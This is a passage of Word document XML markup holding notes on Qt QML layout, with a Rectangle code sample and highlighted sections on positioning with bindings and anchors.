                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>height</w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rStyle w:val="number"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>100</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r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rStyle w:val="name"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>color</w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rStyle w:val="string"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"green"</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r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rStyle w:val="type"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Rectangle</w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> {</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r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rStyle w:val="name"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rStyle w:val="number"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>100</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C50BB7" w:rsidRPr="00700D31" w:rsidRDefault="00C50BB7">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rStyle w:val="name"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>y</w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rStyle w:val="number"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>100</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C50BB7" w:rsidRPr="00700D31" w:rsidRDefault="00C50BB7">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rStyle w:val="name"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>width</w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rStyle w:val="number"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>50</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C50BB7" w:rsidRPr="00700D31" w:rsidRDefault="00C50BB7">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rStyle w:val="name"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>height</w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rStyle w:val="number"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>50</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C50BB7" w:rsidRPr="00700D31" w:rsidRDefault="00C50BB7">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rStyle w:val="name"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>color</w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rStyle w:val="string"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>"yellow"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C50BB7" w:rsidRPr="00700D31" w:rsidRDefault="00C50BB7">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">     }</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C50BB7" w:rsidRPr="00700D31" w:rsidRDefault="00C50BB7">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00700D31">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5102"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50BB7" w:rsidRPr="00C50BB7" w:rsidRDefault="00C50BB7">
            <w:pPr>
              <w:pStyle w:val="centeralign"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50BB7">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00C50BB7">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/manual-layout.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00C50BB7">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005A2BD2">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005A2BD2">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/manual-layout.png"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"http://doc.qt.io/qt-5/images/manual-layout.png"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"http://doc.qt.io/qt-5/images/manual-layout.png"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"http://doc.qt.io/qt-5/images/manual-layout.png"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"http://doc.qt.io/qt-5/images/manual-layout.png"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"http://doc.qt.io/qt-5/images/manual-layout.png"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"http://doc.qt.io/qt-5/images/manual-layout.png"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"http://doc.qt.io/qt-5/images/manual-layout.png"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"http://doc.qt.io/qt-5/images/manual-layout.png"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"http://doc.qt.io/qt-5/images/manual-layout.png"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"http://doc.qt.io/qt-5/images/manual-layout.png"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"http://doc.qt.io/qt-5/images/manual-layout.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidR="00490E7E">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002230B8">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:pict>
                <v:shape id="_x0000_i1059" type="#_x0000_t75" alt="" style="width:151.5pt;height:151.5pt">
                  <v:imagedata r:id="rId2293" r:href="rId2294"/>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C50BB7">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C50BB7" w:rsidRPr="00C50BB7" w:rsidRDefault="00C50BB7" w:rsidP="00700D31">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1939" w:name="positioning-with-bindings"/>
      <w:bookmarkStart w:id="1940" w:name="_Toc483000950"/>
      <w:bookmarkStart w:id="1941" w:name="_Toc483003941"/>
      <w:bookmarkStart w:id="1942" w:name="_Toc483604293"/>
      <w:bookmarkStart w:id="1943" w:name="_Toc483605513"/>
      <w:bookmarkEnd w:id="1939"/>
      <w:r w:rsidRPr="00700D31">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Positioning With Bindings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1940"/>
      <w:bookmarkEnd w:id="1941"/>
      <w:bookmarkEnd w:id="1942"/>
      <w:bookmarkEnd w:id="1943"/>
    </w:p>
    <w:p w:rsidR="00C50BB7" w:rsidRPr="00C50BB7" w:rsidRDefault="00C50BB7" w:rsidP="00C50BB7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Items may also be positioned by assigning </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>binding expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the properties associated with their location in the visual canvas. This type of positioning is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>most highly dynamic</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, however </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>some performance cost</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is associated with positioning items in this manner.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C50BB7" w:rsidRPr="00C50BB7" w:rsidRDefault="00C50BB7" w:rsidP="00C50BB7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The position and dimensions of a visual object can also be set through </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property bindings</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This has the advantage that the values will automatically be updated as the dependencies of the bindings change. For example, the width of one Rectangle might depend on the width of the Rectangle next to it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C50BB7" w:rsidRPr="00C50BB7" w:rsidRDefault="00C50BB7" w:rsidP="00C50BB7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">While bindings provide a very flexible and intuitive way of creating dynamic layouts, it should be noted that there is some </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>performance cost</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> associated with them, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>where possible, pristine Anchor layouts should be preferred</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C50BB7" w:rsidRPr="00C50BB7" w:rsidRDefault="00C50BB7" w:rsidP="00700D31">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1944" w:name="_Toc483000951"/>
      <w:bookmarkStart w:id="1945" w:name="_Toc483003942"/>
      <w:bookmarkStart w:id="1946" w:name="_Toc483604294"/>
      <w:bookmarkStart w:id="1947" w:name="_Toc483605514"/>
      <w:r w:rsidRPr="00700D31">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Anchors</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1944"/>
      <w:bookmarkEnd w:id="1945"/>
      <w:bookmarkEnd w:id="1946"/>
      <w:bookmarkEnd w:id="1947"/>
    </w:p>
    <w:p w:rsidR="00C50BB7" w:rsidRPr="00C50BB7" w:rsidRDefault="00C50BB7" w:rsidP="00C50BB7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Anchors allows an item to be </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>placed either adjacent to or inside of another</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, by attaching one or more of the item's </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>anchor-points</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (boundaries) to an anchor-point of the other. </w:t>
      </w:r>
      <w:r w:rsidRPr="00700D31">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">These anchors will </w:t>
      </w:r>
      <w:r w:rsidRPr="00700D31">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>remain even if the dimensions or location of one of the items changes, allowing for highly dynamic user-interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C50BB7" w:rsidRPr="00C50BB7" w:rsidRDefault="00C50BB7" w:rsidP="00C50BB7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A visual object can be thought of as having various anchor-points (or </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>more correctly, anchor-lines</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">). Other items can be anchored to those points, which means that as any object changes, the other objects which are anchored to it will adjust automatically to </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>maintain the anchoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C50BB7" w:rsidRPr="00C50BB7" w:rsidRDefault="00C50BB7" w:rsidP="00C50BB7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700D31">
        <w:rPr>
          <w:color w:val="404244"/>
